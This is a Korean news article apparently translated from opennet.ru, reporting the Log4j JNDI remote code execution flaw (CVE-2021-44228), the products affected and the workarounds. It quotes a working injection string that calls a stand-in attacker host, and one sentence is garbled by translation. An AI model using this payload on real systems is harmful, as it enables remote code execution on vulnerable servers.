많은 Java 프로젝트에 영향을 미치는 Apache Log4j의 치명적인 취약점

Java 애플리케이션의 로깅을 구성하기 위한 널리 사용되는 프레임워크인 Apache Log4j에서 "{jndi:URL}" 형식의 특별히 형식화된 값이 로그에 기록될 때 임의 코드가 실행될 수 있도록 허용하는 심각한 취약점이 식별되었습니다. 예를 들어 오류 메시지에 문제가 있는 값을 표시하는 경우 등 외부 소스에서 수신한 값을 기록하는 Java 애플리케이션에서 공격이 수행될 수 있습니다.

Steam, Apple iCloud, Minecraft 클라이언트 및 서버를 포함하여 Apache Struts, Apache Solr, Apache Druid 또는 Apache Flink와 같은 프레임워크를 사용하는 거의 모든 프로젝트가 이 문제의 영향을 받는 것으로 나타났습니다. 이 취약점은 Fortune의 65%가 웹 애플리케이션에 사용하는 대략적인 추산에 따르면 Apache Struts 프레임워크의 치명적인 취약점의 역사를 반복하면서 기업 애플리케이션에 대한 대규모 공격의 물결로 이어질 수 있을 것으로 예상됩니다. 취약한 시스템을 찾기 위해 네트워크를 검색하려는 시도를 포함하여 100개 회사.

작동하는 익스플로잇이 이미 게시되었지만 안정적인 브랜치에 대한 수정 사항이 아직 컴파일되지 않았다는 사실로 인해 문제가 더욱 악화됩니다. CVE 식별자가 아직 할당되지 않았습니다. 수정 사항은 log4j-2.15.0-rc1 테스트 브랜치에만 포함되어 있습니다. 취약점을 차단하기 위한 해결 방법으로 log4j2.formatMsgNoLookups 매개변수를 true로 설정하는 것이 좋습니다.

문제는 log4j가 JNDI(Java Naming and Directory Interface) 쿼리를 실행할 수 있는 로그 출력 라인의 특수 마스크 "{}" 처리를 지원한다는 사실로 인해 발생했습니다. 공격은 “${jndi:ldap://attacker.com/a}” 대체 문자열을 전달하는 것으로 요약됩니다. 처리 시 log4j는 Java 클래스 경로에 대한 LDAP 요청을 공격자.com 서버로 보냅니다. . 공격자의 서버에서 반환된 경로(예: http://second-stage.attacker.com/Exploit.class)는 현재 프로세스의 컨텍스트에서 로드 및 실행되며, 이를 통해 공격자는 Exploit에서 임의의 코드를 실행할 수 있습니다. 현재 응용 프로그램의 권한을 가진 시스템입니다.

부록 1: 취약점에는 식별자 CVE-2021-44228이 할당되었습니다.

부록 2: log4j-2.15.0-rc1 릴리스에서 추가된 보호를 우회하는 방법이 확인되었습니다. 이 취약점에 대해 더욱 완벽한 보호 기능을 갖춘 새로운 업데이트인 log4j-2.15.0-rc2가 제안되었습니다. 코드는 형식이 잘못 지정된 JNDI URL을 사용하는 경우 비정상 종료가 발생하지 않는 것과 관련된 변경 사항을 강조합니다.

출처 : opennet.ru